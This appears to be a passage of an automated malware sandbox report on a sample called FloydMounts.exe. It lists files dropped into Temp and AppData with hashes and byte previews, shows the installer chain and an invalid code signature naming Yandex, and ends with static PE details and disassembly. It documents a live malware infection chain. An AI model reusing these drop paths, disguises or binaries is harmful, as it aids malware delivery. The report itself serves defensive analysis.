                                                                                            SHA-512:D6CCA34FB5C46C787A2E0A866A325743CEA87FF21F7B67E9B5DD7F1347F4801F6355C5109FC365DD6DC0807CE2C77CC887AED78BA2D6FEC88991FA2AD16A6F2A
                                                                                            Malicious:false
                                                                                            Preview:6.6K7.8.8.8.9.9.:.;|;.<.<.=.>.>.?B?T?.P..h...m0.0e1i1m1q1u1y1}1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.2.2.2.2.2.2.2.2!2%2)2-2125292=2A2E2I2M2Q2U2Y2]2a2e2i2m2q2u2y2}2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.3.3.3.3.3.3.3.3!3%3)3-3135393=3A3E3I3M3Q3U3Y3]3a3e3i3m3q3u3y3}3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.4.4.5.6Q6.:;:U:.;,<.<.<.=.=5>.>.?.?.?.?.?...`..T....0.080F0N0X0e0s0.3.3.3.3.4.4.4.4.4.4.4.4!4%4)4-4145494=4A4E4I4M4Q4U4Y4]4a4e4i4m4q4u4y4}4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4 5*5:5G7Y7-8?8u9.99:.:.:e<.<L='>+>/>3>7>;>?>C>G>K>O>S>W>[>_>c>g>k>o>s>w>{>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.?.?.?.?.?.?.?.?#?'?+?/?3?7?;???C?G?K?O?S?W?.p.......0g1x1.294@4O4g6.7C738J9|:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.;.;.;.;.; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;\;`;d;h;l;p;t;x;|;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.<.=.>.>.?.?.?.?.?.?.?.? ?$?(?,?0?4?8?<?@?D?H?L?....@....0.0.1.

                                                                                            C:\Users\user\AppData\Local\Temp\Rj

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\FloydMounts.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):82944
                                                                                            Entropy (8bit):7.998057958270943
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:+032L5piMRNdPvsmkOn6/fTPdQKFNR/5kuvlUIi7d8FMdfx2ec+T2QMKLekt0MB8:FGL5pBN51kO6TrR/5kuvTiJWMlx2ePsj
                                                                                            MD5:129FE56DB6607EE77F3EAE2AE1493B22
                                                                                            SHA1:4E0A565D15ADD9AC344F756A09775A1AFC55AEA1
                                                                                            SHA-256:BFA18CF8E5DEF17BC15929DEBD257E9F0966EA736647EEE06FDB334A02644933
                                                                                            SHA-512:9F1AE9102E1EFD166610B6FE421ACC27EDE6D2EA88D0775BDE66D796711AD4BCDF2B298279078E7BAA033481D96F42A85961FF8F77EB566924076CC2549C0F0E
                                                                                            Malicious:false
                                                                                            Preview:..8.5.(....L..z..H.2@..~.......$..G...,{..&.....U..g....:..J.J+[.."l.u.N...Xx}.O.~.W.|w..K.Ul&...J.t`..8.5n....).2...X%v.X..).,....PL.)..l....%;9[R._u.tvq..W.!.<...`<(w.}..%ZJ"|.=u....6......jI.Y.#...M.........h.\(....7...nh".b...hJ..W..x.Z...e....N5nb..+..j...f....D.q.j...?.."V1....t.o...U..$K..x..b.........-.j..;....E.L@.3L/.AsG.grR....O.e..w.aA.........v..Ul..b../..VI.f...M...q...D.)s..eSG.v.n....1.n<p..-][.&f.f.........hu.x.......K:~...$..:.c..Dh{p!%...c.7.;B...........).....z.f...m..H.(.pl..q......L$Af...r$$=.N.....<."..X8...U.V:..x.(.|_R.@..`... ..)..[a.p@6Rb.R............^N....Z7...ra.f.A...a.&<..4I.X..v8.f..`hg..S....'(8......4.......S..'..h..F......I.t...@..:.Gc..L.....x...H.@v#...i...4!Z.54-)\._S.%...e....B{M.x.Y.W...{...N.~.;..H.'.R.....<...0....b~....ugS.%b.VKi...q.......W8.[*..m.....S.r.H.A..$.}@.........8*D.w....3d.T4..@..L+a..4+4.!.y.HN....Uh.T...|...i.4].......'l..Gk.;B..]..5.=.,....K@..pe.1....3....5...z....z.."M#

                                                                                            C:\Users\user\AppData\Local\Temp\Rose

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                            File Type:StarOffice Gallery theme L)M, 3957914717 objects, 1st 2\300j\017\210E\013\377\025\034\325I
                                                                                            Category:dropped
                                                                                            Size (bytes):57344
                                                                                            Entropy (8bit):6.557100070986857
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:I18OWrM81EyJqx9EdzGGXZVfmlqTmN5WAQIGK2ud5lS87uzh7JCQ/sE7mOB6XSHi:I1/AD1EsdzVXnP94SGGLpRB6M28eFvH
                                                                                            MD5:E0B9C3FB54D7E9C504BEDDA860C53286
                                                                                            SHA1:6D828745F7126BF0FF8D6157AF1E208FA018CA8D
                                                                                            SHA-256:A28FE80B25D6BCE73C45C0A23C449C89B0D178D6140037EA7A05CDB3F3D51A79
                                                                                            SHA-512:DB638761BAB6BDD21043D5F587CA60D63EA42FBE4833F30B114A4F8422BF100EFC7D13B1D2969E926E7954540E721F5000CB56E62EC9CD4B7CA21FC314F4E128
                                                                                            Malicious:false
                                                                                            Preview:....L)M....tv.}.........@)M.3.VW.}.B....U..0...E............}..t .M.......~L........E.j.P.FL......E....u..E ...u..~8...q....._^....3....FP..FT..U...u...(M..K...P.....j.j.j..u...x.I.]...U..Q.@)M.V.u.Wj.....8W.z...............d)M.j.Z.U.;........T)M.....0.........F.;G.u{............8......../.....................VW......~d...(....~h...0....~D...8....~P...@....>.t..6..<.I..&..u........d)M..U.B.U.;..._....u... .........$.........@)M........t.Q.=.....@)M..... ..5.)M..E.N.5.)M.;.L)M.u...L)M....D)M.........._..^u..5.)M.j.....I..%.)M....D)M...t..@)M..D...8.u..<)M...........U..E.VW.@......P......u..........>3._.F.....^]...U......`.D$.V.u.WP.D$.PV..............L$..@)M..T$..L$........T)M..L$.....8.|$..............'........P............H..............a...WQ.P....7..<.I..t$...D.........d.........h.........P........D$.;F.t.P.....3.@_^..]....L$..N...3...U..V.u.;5t)M.........T)M........t.Q......T)M..... ...`)M...T)M.;5d)M.u....|.....8.u.N...5d)M...X)M.^...v..D...8.t.]...I..X)M.j..4......T)M.Y

                                                                                            C:\Users\user\AppData\Local\Temp\Share

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\FloydMounts.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):70656
                                                                                            Entropy (8bit):7.997422533213758
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:Vf/y5sY4AVGctAuYfF1+Jbju/W381Fy5SwjI1UdQx/Hqj69og5hP2sBhpb0:947VKr+JbjH381Q5SX1UdQdog5hP2Ub0
                                                                                            MD5:87DBCBA208DB9A09756256F7AE280E58
                                                                                            SHA1:8AB1ACD8A79C967942C3795426C24B732ECC5CF2
                                                                                            SHA-256:EB3793298937E93429FB886895AF6B22517FE37B2709122D107A721D3D37CE9B
                                                                                            SHA-512:49954D492195DCD9876F99DBE469F3C5BEE41FDFBA5060B57BB62568BD506D0F5EE17D19E18C79E48CAF407A408BCC8A6DCB8DB73CB6FF50966C889EC8E703CA
                                                                                            Malicious:false
                                                                                            Preview:...2.n.A..;..b.[.w....O6.r.C..I.u,..-...t..gZ....!.]....'..p..yJ....ibm....=...E.(.... ...........F..sZ*..T....*...2)...juhw}...e~.d.im.T...n.%..wa..97X!I.......`....*u.T....C.e{..D..i.b...6\4..bI.t..%.......{..i.........c....2.!)^.qDl....3w.g.EY.P..,...OH.z...Z..zHg.,..q.....5L.#F.2._..R.".......N....V...Sq<Dg.......o.-n..>78..$..YJ..S^...s...Or._:(.T.......:.i.(.Q.>.........v...X.j{'.|.g.\9.].'.q.........,...q#...N)...I..........^c.sg0aO..d.K.jZG1:...[.&H........J...q&..6.68<]......c....:..jH".>.tM....$......r...91...6j...`..=Lp..%.....HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....2.G.'.F...h..............W.......W......kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...

                                                                                            C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exe

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\174436\Produces.com
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):11728114
                                                                                            Entropy (8bit):7.974646297516563
                                                                                            Encrypted:false
                                                                                            SSDEEP:196608:KbHkDuHk/RU/RXE2hxZKYokT5D7c6OZ0zLVhPoJOo0W/Di:KbHkqEKpE2JK5kF/c6OZ0zLVhPoJd
                                                                                            MD5:1DBAC9190F7C834BBB99CE9010475856
                                                                                            SHA1:B72A51A3D82552E07A6D0DBBBFBD072BC861F39B
                                                                                            SHA-256:68D78D466CC96BF03CF5A1A24E5568E97256BAEBC0C4500BC64F45347EB4203F
                                                                                            SHA-512:522C6E7D036B68658F8C20A66DAC83EF4DF20CB8B7C356848AFEB40585D774D90CC725B17DFF9562E12D52B063E10653BAB7486FCE8B0217A82B7ADD7D8B1E7E
                                                                                            Malicious:false
                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.................t...p....................@..................................1/...@......@...................p..q....P......................R...............................................................R..\....`.......................text....V.......X.................. ..`.itext..d....p.......\.............. ..`.data...88.......:...x..............@....bss....Xr...............................idata.......P......................@....didata......`......................@....edata..q....p......................@..@.tls.....................................rdata..]...........................@..@.reloc..............................@..B.rsrc...............................@..@....................................@..@................

                                                                                            C:\Users\user\AppData\Local\Temp\a329edd1

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exe
                                                                                            File Type:PNG image data, 1632 x 5320, 8-bit/color RGB, non-interlaced
                                                                                            Category:dropped
                                                                                            Size (bytes):7092889
                                                                                            Entropy (8bit):7.998387414861331
                                                                                            Encrypted:true
                                                                                            SSDEEP:196608:QeUGSnd0ET5dXQEI+XTkVwN/LDqMeuF/q:Q9LTrAojdluMeuF/q
                                                                                            MD5:63CE03B7180EDD5AC461953F18192018
                                                                                            SHA1:5C7769582080A8E1EB197E4620204A9744D916AA
                                                                                            SHA-256:1EDA899368CD138B7A20E37BCD9B875EACA2BF1572CAEAA3DF83DF7DC1CB12AD
                                                                                            SHA-512:624F289EBC4230190069E4AB26C1EAB6EED9B94166BA252266DF3FF1C2E928798D87F034E9AA6015C7E7ACEB66570BD1C3471B8A76862267375D8F7F0D8346FD
                                                                                            Malicious:false
                                                                                            Preview:.PNG........IHDR...`...........r.. .IDATx..;.$....+.U.{..F.]./.l.#..c.k..M..K.r.!m.G6....ec.k......J...W....ft...Y........<=...Q5..G|.......+A........:.m........h.a.a.....}s).#.9~.4..>.J]..R.+M.K.!...+.s...4..W.c.+Zk.+B.s...p......R...PU....JUU..RJ.......^...Ru]..n...&w.R.WeE.DH.kB...)....!.....cRI.....d.u.....W..j..xw... .e,.....lC`....o=....A..;.l....;.oX...h..3...@..l.........".@zZW..a...v...Uww.C..n'.31l.1..U9\F..K..c|\i................`........G.......3.p..^Jp....1...|$....N...q`.I..Jt9.v..L.q..I~{)..>.uw..oY.d...\..;~<T..\w..s....R.1...n......9H0g.x............t}/$ .....{...........&h...N...@S.w.},_.&."..K.....v....1.........k.d0.|@j.b.cr..,..^M`.r..>.o..)<\!w...a...+....ea.p...N...............\-.:.>_.......}.?..J..o.o..xY....m.3....f.....\...}..d.Z....7.......{.|.$c|..J.Ld..`.J.1Qi=....`.R2...K....1....v....{...8.>.. .......-.T./.j|....}H...0N..\......o'....t.\=$...........{H.a.>...EQ....|F....8RI...#F...K.$;O.. .ij....o.....

                                                                                            C:\Users\user\AppData\Local\Temp\is-7TFI6.tmp\_isetup\_isdecmp.dll

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmp
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:modified
                                                                                            Size (bytes):35616
                                                                                            Entropy (8bit):6.953519176025623
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                            MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                            SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                            SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                            SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\is-7TFI6.tmp\_isetup\_setup64.tmp

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmp
                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):6144
                                                                                            Entropy (8bit):4.720366600008286
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\is-ATTO3.tmp\X4PCDQPDT1B8IDPB7SN83.tmp

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):3367424
                                                                                            Entropy (8bit):6.53001282597034
                                                                                            Encrypted:false
                                                                                            SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                            MD5:A62041070E18901131CBBE7825EC4EC7
                                                                                            SHA1:67DB71F5A885B1E417B1272218E6B814C45A6C93
                                                                                            SHA-256:E25EF8AA3AB40EE6950DACC4CCD9EDD1EBE973D45109F6EEF34F7F49E26A2E27
                                                                                            SHA-512:AE560D59071F8E2D484E5607E6A3C6CAC52F011A6CB3F16B5EECB767F555D10A480AF32FE0BEB0DC6FF4B6BEC99B536AEBA58AD6697DAB72AAF60BD46F3BFC83
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

                                                                                            C:\Users\user\AppData\Local\Temp\is-HQ019.tmp\_isetup\_isdecmp.dll

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmp
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):35616
                                                                                            Entropy (8bit):6.953519176025623
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                            MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                            SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                            SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                            SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\is-HQ019.tmp\_isetup\_setup64.tmp

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmp
                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):6144
                                                                                            Entropy (8bit):4.720366600008286
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmp

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\X4PCDQPDT1B8IDPB7SN83.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):3367424
                                                                                            Entropy (8bit):6.53001282597034
                                                                                            Encrypted:false
                                                                                            SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                            MD5:A62041070E18901131CBBE7825EC4EC7
                                                                                            SHA1:67DB71F5A885B1E417B1272218E6B814C45A6C93
                                                                                            SHA-256:E25EF8AA3AB40EE6950DACC4CCD9EDD1EBE973D45109F6EEF34F7F49E26A2E27
                                                                                            SHA-512:AE560D59071F8E2D484E5607E6A3C6CAC52F011A6CB3F16B5EECB767F555D10A480AF32FE0BEB0DC6FF4B6BEC99B536AEBA58AD6697DAB72AAF60BD46F3BFC83
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

                                                                                            C:\Users\user\AppData\Roaming\UltraMedia\is-PGV92.tmp

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmp
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):979298672
                                                                                            Entropy (8bit):0.20778792436382168
                                                                                            Encrypted:false
                                                                                            SSDEEP:
                                                                                            MD5:6148379F983034E295E4A943A5F1198F
                                                                                            SHA1:EDC450D0785D84BA4C99449BE9132AA5AE590170
                                                                                            SHA-256:BCFD2CE5B1FE4AF3B920F5A6D3E4B4B9C77A619CC36F7C96C3C53D8A8FB2FC33
                                                                                            SHA-512:472EEDFF596451D28800CC0BCE09BACE2B6269430699A745908D86D772959B68AC406226E886CAC47B803F5D2CD0E6EC3A1CBB85B35F89BF2C822ACB2F1E0822
                                                                                            Malicious:false
                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..................J.........$.J.......J...@..........................................................................pM..U...pR..............^:.)....M.F|............................M.......................M..............................text...t3J......4J................. ..`.itext...K...PJ..L...8J............. ..`.data........J.......J.............@....bss.........PL......0L..................idata...U...pM..V...0L.............@....tls..........M.......L..................rdata........M.......L.............@..@.reloc...|....M..~....L.............@..B.rsrc........pR.......Q.............@..@.............Ps.......q.............@..@................................................................................................

                                                                                            C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exe (copy)

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmp
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):979298672
                                                                                            Entropy (8bit):0.20778792436382168
                                                                                            Encrypted:false
                                                                                            SSDEEP:
                                                                                            MD5:6148379F983034E295E4A943A5F1198F
                                                                                            SHA1:EDC450D0785D84BA4C99449BE9132AA5AE590170
                                                                                            SHA-256:BCFD2CE5B1FE4AF3B920F5A6D3E4B4B9C77A619CC36F7C96C3C53D8A8FB2FC33
                                                                                            SHA-512:472EEDFF596451D28800CC0BCE09BACE2B6269430699A745908D86D772959B68AC406226E886CAC47B803F5D2CD0E6EC3A1CBB85B35F89BF2C822ACB2F1E0822
                                                                                            Malicious:true
                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..................J.........$.J.......J...@..........................................................................pM..U...pR..............^:.)....M.F|............................M.......................M..............................text...t3J......4J................. ..`.itext...K...PJ..L...8J............. ..`.data........J.......J.............@....bss.........PL......0L..................idata...U...pM..V...0L.............@....tls..........M.......L..................rdata........M.......L.............@..@.reloc...|....M..~....L.............@..B.rsrc........pR.......Q.............@..@.............Ps.......q.............@..@................................................................................................

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):7.969441175148279
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:FloydMounts.exe
                                                                                            File size:1'391'572 bytes
                                                                                            MD5:a3e3a09c63c5270ac7e96a7b25034335
                                                                                            SHA1:2df0d057d0a1674afce368e491113adff5c90570
                                                                                            SHA256:b8e176aa49edb6f9bedb2e3f3e36fbfe046af1d7550f58938cd4b04c94b92f84
                                                                                            SHA512:a2caf95bb5ca4b8c7fec6402b92df3b1c7d5d0c9ff14e5af96ae86d85c60cdbd4d843a461c57b8157d2985644b9041f6e7451dbaedc74d33518a62d3c6dec008
                                                                                            SSDEEP:24576:IupP3xnrllsRzX+I17CrM9LZYiaRf+99HckvcPmpW7VFuMsHoimlNqzBT:vdrlls11erCpaRMWkE2W7fhkoHK
                                                                                            TLSH:5E552396ADF81532FA545A3378F6670B8E2FFC601074D51F2B824DDD18227A0876CBB9
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....

                                                                                            File Icon

                                                                                            Icon Hash:f0f8f6e6eaeae960

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x4038af
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:true
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:5
                                                                                            OS Version Minor:0
                                                                                            File Version Major:5
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:5
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                            Authenticode Signature

                                                                                            Signature Valid:false
                                                                                            Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                            Error Number:-2146869232
                                                                                            Not Before, Not After
                                                                                            • 20/03/2024 14:23:35 21/03/2026 14:23:35
                                                                                            Subject Chain
                                                                                            • CN=YANDEX LLC, O=YANDEX LLC, STREET="Lev Tolstoy street, 16", L=Moscow, S=Moscow, C=RU, OID.1.3.6.1.4.1.311.60.2.1.2=Moscow, OID.1.3.6.1.4.1.311.60.2.1.3=RU, SERIALNUMBER=1027700229193, OID.2.5.4.15=Private Organization
                                                                                            Version:3
                                                                                            Thumbprint MD5:9906E73CDAF5570B04FDE09A4BCB74A9
                                                                                            Thumbprint SHA-1:46E2F09D295573BB09DACC6B209B142C244A30D6
                                                                                            Thumbprint SHA-256:6E4B1A3C72EF08F8311CF4F596DE8CCA679D06C51A87E1C5714F8DECB84BCB37
                                                                                            Serial:6F126C9CC287DE458CE890F6

                                                                                            Entrypoint Preview

                                                                                            Instruction
                                                                                            sub esp, 000002D4h
                                                                                            push ebx
                                                                                            push ebp
                                                                                            push esi
                                                                                            push edi
                                                                                            push 00000020h
                                                                                            xor ebp, ebp
                                                                                            pop esi
                                                                                            mov dword ptr [esp+18h], ebp
                                                                                            mov dword ptr [esp+10h], 0040A268h
                                                                                            mov dword ptr [esp+14h], ebp
                                                                                            call dword ptr [00409030h]
                                                                                            push 00008001h
                                                                                            call dword ptr [004090B4h]
                                                                                            push ebp
                                                                                            call dword ptr [004092C0h]
                                                                                            push 00000008h
                                                                                            mov dword ptr [0047EB98h], eax
                                                                                            call 00007F69D8F0410Bh
                                                                                            push ebp
                                                                                            push 000002B4h
                                                                                            mov dword ptr [0047EAB0h], eax
                                                                                            lea eax, dword ptr [esp+38h]
                                                                                            push eax
                                                                                            push ebp
                                                                                            push 0040A264h
                                                                                            call dword ptr [00409184h]
                                                                                            push 0040A24Ch
                                                                                            push 00476AA0h
                                                                                            call 00007F69D8F03DEDh
                                                                                            call dword ptr [004090B0h]
                                                                                            push eax
                                                                                            mov edi, 004CF0A0h
                                                                                            push edi
